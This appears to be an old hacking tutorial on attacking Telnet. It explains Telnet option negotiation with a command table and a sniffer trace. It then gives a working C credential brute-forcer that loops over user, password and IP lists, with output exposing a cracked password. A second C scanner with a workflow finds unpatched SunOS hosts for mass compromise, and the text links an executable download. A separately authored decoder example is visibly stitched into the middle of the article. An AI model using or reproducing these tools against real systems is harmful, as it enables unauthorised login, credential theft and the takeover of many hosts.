Author: loose   Source: gray track   Added: 2003-3-10

What is usually called a "telnet attack" comes down to two things: guessing the credentials of a Telnet user, and overflows in the telnet service or the telnet process. Beyond those I don't think Telnet raises many questions. A Telnet connection, however, is not as simple as most people imagine: there is no encryption as in SSH, but the session is more complex than FTP.

D:\> telnet 192.168.25.1
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
login: chi
Password: xxxxxx
Last login: Mon Feb 24 13:43:30 from 192.168.25.1
[chi@chi chi]$

Now let's get to know Telnet a little. The purpose of the Telnet protocol is to provide a fairly general, bi-directional, eight-bit byte-oriented communications facility. Its primary goal is to allow a standard method of interfacing terminal devices and terminal-oriented processes to each other. It is envisioned that the protocol may also be used for terminal-to-terminal communication and for process-to-process communication (distributed computation). A Telnet connection is a TCP connection used to transmit data interspersed with Telnet control information.

The Telnet protocol rests on three ideas:

1. The concept of a Network Virtual Terminal. When a Telnet connection is established, each end is assumed to originate and terminate at a Network Virtual Terminal (NVT). The NVT is an imaginary device that provides a standard, network-wide representation of a canonical terminal. This eliminates the need for the "server" and "user" hosts to keep information about the characteristics of each other's terminals; each end maps its own terminal onto the NVT and the dialogue is carried out in NVT terms.

2. The principle of negotiated options. Using the "DO, DON'T, WILL, WON'T" structure, the user and the server can agree on a more elaborate set of conventions for their Telnet session. Options include changing the character set, the echo mode and so on. The basic rule for options is that either party may initiate a request for an option to take effect; the other party may accept or reject the request. If the request is accepted, the option takes effect immediately; if it is rejected, the connection keeps the properties of a basic NVT.

3. Coordination between terminal and process. With a half-duplex terminal, the hardware gives up control at the end of each line; the local computer then processes the input, decides whether output is required and, if not, hands control back to the terminal. If output is required, the computer keeps control until the output has been sent. The difficulty of using such a terminal across a network is obvious: a good deal of coordination is needed.

All Telnet commands consist of at least a two-byte sequence: the "Interpret as Command" (IAC) escape byte followed by the command code. Commands that deal with option negotiation are three-byte sequences, the third byte being the option code in question. The defined Telnet commands are:

    SE                   240  End of subnegotiation parameters.
    NOP                  241  No operation.
    Data Mark            242  The data stream portion of a Synch. This should always be accompanied by a TCP Urgent notification.
    Break                243  NVT character BRK.
    Interrupt Process    244  The IP function.
    Abort Output         245  The AO function.
    Are You There        246  The AYT function.
    Erase Character      247  The EC function.
    Erase Line           248  The EL function.
    Go Ahead             249  The GA signal.
    SB                   250  Indicates that what follows is subnegotiation of the indicated option.
    WILL (option code)   251  Indicates the desire to begin performing, or confirmation that you are now performing, the indicated option.
    WON'T (option code)  252  Indicates the refusal to perform, or to continue performing, the indicated option.
    DO (option code)     253  Indicates the request that the other party perform, or confirmation that you are expecting the other party to perform, the indicated option.
    DON'T (option code)  254  Indicates the demand that the other party stop performing, or confirmation that you are no longer expecting the other party to perform, the indicated option.
    IAC                  255  Data byte 255.

We use a sniffer to follow the Telnet login process. Each line is one frame: frame number, protocol, MAC addresses, IP addresses, ports, delta time, frame length and the decoded Telnet content ("<=" means the server 192.168.25.3:23 is sending to the client, "=>" means the client is sending).

9,   IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.391, 66,  Telnet Command: Do Terminal-Type  Command: Do Terminal-Speed  Command: Do X-Display-Location  Command: Do New-Environ
10,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 60,  Telnet Command: Will Terminal-Type  Command: Will NAWS
13,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,  Telnet Command: Won't Terminal-Speed  Command: Won't X-Display-Location  Command: Won't New-Environ
18,  IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 63,  Telnet Command: Do NAWS  Command: SB Terminal-Type  Command: SE
26,  IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 66,  Telnet Command: Will Suppress-Go-Ahead  Command: Do Echo  Command: Will Status  Command: Do Toggle-Flow-Control
31,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 63,  Telnet Command: Will Echo  Command: Won't Status  Command: Won't Toggle-Flow-Control
34,  IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.040, 126, Telnet Command: Don't Echo  Command: Will Echo  Data: Red Hat Linux release 7.3 (Valhalla) Kernel 2.4.18-3 on an i686
(note that the banner is received here)
35,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 57,  Telnet Command: Won't Echo
36,  IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 61,  Telnet Data: login:
(the "login:" bytes are received)
39,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.000, 57,  Telnet Command: Do Echo
(at this point you can send your username)
62,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.010, 56,  Telnet Data:
67,  IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 64,  Telnet Data: Password:
(the "Password:" bytes are received)
97,  IP/TCP, 00:01:02:E1:35:84 => 00:50:56:46:40:41, 192.168.25.1 => 192.168.25.3, 3225 => 23, 0.220, 56,  Telnet Data:
(sending is complete; on success the following is returned)
104, IP/TCP, 00:01:02:E1:35:84 <= 00:50:56:46:40:41, 192.168.25.1 <= 192.168.25.3, 3225 <= 23, 0.000, 105, Telnet Data: Last login: Thu Feb 27 10:06:16 from 192.168.25.1
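To make the command table and the sniffer trace above concrete, here is an added example (it is not code from the original article or from its tools): a small decoder that walks a received Telnet buffer, recognises the IAC sequences (two-byte commands, three-byte DO/DON'T/WILL/WON'T option commands, and SB ... SE subnegotiation), separates them from the plain data bytes, and prints them the way the sniffer does. It also implements the reply rule from point 2 above that the article's programs rely on: answer every DO with WON'T and every WILL with DON'T, so that no option is enabled and the connection stays a basic NVT. The sample buffer is constructed for the example; the option names follow the IANA telnet-options registry, spelled as the sniffer prints them.

```c
#include <stdio.h>
#include <string.h>

/* Telnet command bytes (RFC 854), as in the table above. */
#define IAC  255
#define DONT 254
#define DO   253
#define WONT 252
#define WILL 251
#define SB   250
#define SE   240

/* Options that appear in the trace above (IANA telnet-options registry). */
static const char *option_name(unsigned char opt)
{
    switch (opt) {
    case 1:  return "Echo";
    case 3:  return "Suppress-Go-Ahead";
    case 5:  return "Status";
    case 24: return "Terminal-Type";
    case 31: return "NAWS";
    case 32: return "Terminal-Speed";
    case 33: return "Toggle-Flow-Control";
    case 35: return "X-Display-Location";
    case 39: return "New-Environ";
    default: return "Unknown";
    }
}

/* WILL..DON'T are 251..254, so the verb is an index from WILL. */
static const char *verb_name[] = { "Will", "Won't", "Do", "Don't" };

/* Walk a received buffer. Each command found is appended to `out` as one line
 * (sniffer style); bytes outside IAC sequences are copied to `data`.
 * Returns the number of commands decoded. */
int decode_telnet(const unsigned char *in, size_t len,
                  char *out, size_t outsz, char *data, size_t datasz)
{
    size_t i = 0, dlen = 0;
    int n = 0;
    char line[64];
    out[0] = '\0';
    while (i < len) {
        if (in[i] != IAC) {                        /* ordinary data byte */
            if (dlen + 1 < datasz) data[dlen++] = (char)in[i];
            i++;
            continue;
        }
        if (i + 1 >= len) break;                   /* IAC cut off at buffer end */
        unsigned char cmd = in[i + 1];
        if (cmd == IAC) {                          /* IAC IAC = escaped data byte 255 */
            if (dlen + 1 < datasz) data[dlen++] = (char)0xFF;
            i += 2;
            continue;
        }
        if (cmd == SB) {                           /* IAC SB <opt> ... IAC SE */
            if (i + 2 >= len) break;
            size_t j = i + 3;
            while (j + 1 < len && !(in[j] == IAC && in[j + 1] == SE)) j++;
            if (j + 1 >= len) break;               /* SE never arrived */
            snprintf(line, sizeof line, "SB %s (%zu bytes) SE\n",
                     option_name(in[i + 2]), j - (i + 3));
            i = j + 2;
        } else if (cmd >= WILL && cmd <= DONT) {   /* three-byte option command */
            if (i + 2 >= len) break;
            snprintf(line, sizeof line, "%s %s\n",
                     verb_name[cmd - WILL], option_name(in[i + 2]));
            i += 3;
        } else {                                   /* two-byte command: NOP, AYT, ... */
            snprintf(line, sizeof line, "Command %u\n", (unsigned)cmd);
            i += 2;
        }
        strncat(out, line, outsz - strlen(out) - 1);
        n++;
    }
    data[dlen] = '\0';
    return n;
}

/* Reply rule used by the article's programs: DO gets WON'T, WILL gets DON'T,
 * so every option is refused and the session stays a basic NVT.
 * Returns the number of reply bytes written. */
size_t refuse_options(const unsigned char *in, size_t len,
                      unsigned char *reply, size_t replysz)
{
    size_t i = 0, r = 0;
    while (i + 2 < len) {
        if (in[i] == IAC && (in[i + 1] == DO || in[i + 1] == WILL)) {
            if (r + 3 > replysz) break;
            reply[r++] = IAC;
            reply[r++] = (in[i + 1] == DO) ? WONT : DONT;
            reply[r++] = in[i + 2];
            i += 3;
        } else {
            i++;
        }
    }
    return r;
}

/* Constructed sample: the first two commands of frame 9 (DO Terminal-Type,
 * DO Terminal-Speed), a Terminal-Type subnegotiation, then "login: " as data. */
static const unsigned char SAMPLE[] = {
    IAC, DO, 24, IAC, DO, 32, IAC, SB, 24, 1, IAC, SE,
    'l', 'o', 'g', 'i', 'n', ':', ' '
};

int main(void)
{
    char out[256], data[64];
    unsigned char reply[32];
    int n = decode_telnet(SAMPLE, sizeof SAMPLE, out, sizeof out, data, sizeof data);
    size_t r = refuse_options(SAMPLE, sizeof SAMPLE, reply, sizeof reply);
    printf("%d commands:\n%sdata: \"%s\"\nreply bytes: %zu\n", n, out, data, r);
    return 0;
}
```

Refusing every option is the simplest legal behaviour under the negotiation rule in point 2: a rejected request leaves the connection at basic NVT, which is exactly why the article's programs can then read the banner and the prompts as plain bytes. The decoder also handles the two cases a naive loop gets wrong, an IAC escaped as IAC IAC inside data and a subnegotiation whose SE has not arrived yet.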
For Telnet, a successful login ends here, and following the process above you can write a Telnet username guesser yourself!

/******************************************************************************
 This is the Telnet user checker I wrote on my Red Hat 7.3. You can use it as it
 is, or change it however you like.
 ******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 23
#define MAX 1024

int usage(char *pro);
void telnet_banner(char *ip, char *check_user, char *check_pass);

int main(int argc, char *argv[])
{
    FILE *userfile;
    FILE *passfile;
    FILE *ipfile;
    char user[1024];
    char pass[1024];
    char scan_ip[1024];

    if (argc < 4) {
        usage(argv[0]);
        exit(1);
    }
    if ((ipfile = fopen(argv[3], "r")) == NULL) {
        printf("could not read the ipfile\n");
        exit(2);
    }
    /* for every ip, for every user, for every password */
    while (fscanf(ipfile, "%s", scan_ip) != EOF) {
        if ((userfile = fopen(argv[1], "r")) == NULL) {
            printf("could not read the inputfile\n");
            exit(2);
        }
        while (fscanf(userfile, "%s", user) != EOF) {
            if ((passfile = fopen(argv[2], "r")) == NULL) {
                printf("could not read the passfile\n");
                exit(2);
            }
            while (fscanf(passfile, "%s", pass) != EOF) {
                telnet_banner(scan_ip, user, pass);
            }
            fclose(passfile);
        }
        fclose(userfile);
    }
    fclose(ipfile);
    exit(1);
}

int usage(char *pro)
{
    printf("welcome to www.9836.com\n");
    printf("Usage: %s <userfile> <passfile> <ipfile>\n", pro);
    exit(0);
}

void telnet_banner(char *ip, char *check_user, char *check_pass)
{
    struct sockaddr_in addr;
    unsigned char buf[MAX];
    int sock, i = 0;

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        printf("socket fault");
        exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(ip);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        printf("connect fault");
        exit(1);
    }
    /* answer the server's first option requests: every DO gets a WON'T */
    while (i < 10) {
        read(sock, buf, 1);
        if (*buf == 255) {                  /* IAC */
            read(sock, buf + 1, 2);
            if (*(buf + 1) == 253) {        /* is it DO? */
                *(buf + 1) = 252;
                write(sock, buf, 3);        /* send WON'T */
            }
        }
        i++;
    }
    if (*buf != 0) {
        bzero(buf, sizeof(buf));
        read(sock, buf, sizeof(buf));       /* read the telnet banner */
        printf("%s", buf);
    }
    bzero(buf, sizeof(buf));
    read(sock, buf, sizeof(buf));           /* "login:" */
    *(buf + 0) = 255;
    *(buf + 1) = 253;
    *(buf + 2) = 0x01;
    write(sock, buf, 3);                    /* IAC DO ECHO */
    write(sock, check_user, strlen(check_user));   /* send the username */
    *(buf + 0) = 0x0d;
    *(buf + 1) = 0x0a;
    write(sock, buf, 2);                    /* CR LF: the input is complete */
    read(sock, buf, sizeof(buf));
    read(sock, buf, sizeof(buf));           /* "Password:" */
    write(sock, check_pass, strlen(check_pass));   /* send the password */
    *(buf + 0) = 0x0d;
    *(buf + 1) = 0x0a;
    write(sock, buf, 2);                    /* CR LF: the input is complete */
    bzero(buf, sizeof(buf));
    read(sock, buf, sizeof(buf));           /* read the result */
    printf("%s", buf);
    if (strstr((char *)buf, "from") != NULL) {     /* "Last login ... from" means success */
        printf("\nuser %s is found, password is %s\n", check_user, check_pass);
    }
    close(sock);
}

/******************************************************************************/

Run result:

E:\cygwin\home\chi> telnet user.txt pass.txt ip.txt
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
Last login: Thu Feb 27 20:07:49 from 192.168.25.3

user chi is found, password is 2211wen
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
Red Hat Linux release 7.3 (Valhalla)
Kernel 2.4.18-3 on an i686
ssword:
E:\cygwin\home\chi>

Apart from guessing Telnet users, there are also overflows in the Telnet service or the telnet process. Telnet login actually goes through the login program (everyone will think of rootkits), and for the SunOS Telnet vulnerability there are still many hosts that have not been patched. I won't describe how the SunOS Telnet hole is used; I'll only summarize the way to collect a large number of hosts ("broilers"). A default SunOS installation opens Telnet, and most SunOS hosts never deliberately change the banner, so the Telnet banner is very important to us. First open SuperScan and scan a large range for port 111 or 22, which distinguishes UNIX machines from Windows machines (Windows hosts have neither); save the list you swept and import it into SuperScan again, this time scanning port 23, so that no host is missed. Then filter SuperScan's output into a list of pure IPs. [The program needed for this can be downloaded from http://9836.com/software/file.exe] Next comes the Telnet banner scan!
Don't forget the program above: I have changed it into a Telnet banner checker rather than a user scanner.

/******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define PORT 23
#define MAX 1024

FILE *output;

int usage(char *pro);
void telnet_banner(char *ip, char *times);

int main(int argc, char *argv[])
{
    FILE *input;
    char scan_ip[1024];

    if (argc < 3) {
        usage(argv[0]);
        exit(1);
    }
    if ((output = fopen(argv[2], "wb")) == NULL) {
        printf("could not creat the outputfile\n");
        exit(2);
    }
    if ((input = fopen(argv[1], "r")) == NULL) {
        printf("could not read the inputfile\n");
        exit(2);
    }
    while (fscanf(input, "%s", scan_ip) != EOF) {
        telnet_banner(scan_ip, argv[3]);   /* argv[3] is NULL when only two arguments are given; it is not used */
    }
    fclose(input);
    fclose(output);
    exit(1);
}

int usage(char *pro)
{
    printf("welcome to www.9836.com\n");
    printf("Usage: %s <ipfile> <outputfile>\n", pro);
    exit(0);
}

void telnet_banner(char *ip, char *times)
{
    struct sockaddr_in addr;
    unsigned char buf[MAX];
    int sock, i = 0;

    (void)times;                            /* unused */
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        printf("socket fault");
        exit(1);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(PORT);
    addr.sin_addr.s_addr = inet_addr(ip);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) {
        printf("connect fault");
        exit(1);
    }
    /* answer the server's first option requests: every DO gets a WON'T */
    while (i < 10) {
        read(sock, buf, 1);
        if (*buf == 255) {
            read(sock, buf + 1, 2);
            if (*(buf + 1) == 253) {
                *(buf + 1) = 252;
                write(sock, buf, 3);
            }
        }
        i++;
    }
    if (*buf != 0) {
        bzero(buf, sizeof(buf));
        read(sock, buf, sizeof(buf));       /* read the telnet banner */
        printf("%s", buf);
        if (strstr((char *)buf, "SunOS") != NULL) {
            *(buf + 14) = 0;                /* keep only the first 14 bytes of the banner */
            fprintf(output, "%s", buf);
            fputs(ip, output);
        }
    }
    close(sock);
}

/******************************************************************************/

Comments and corrections are welcome; thanks to everyone for their help.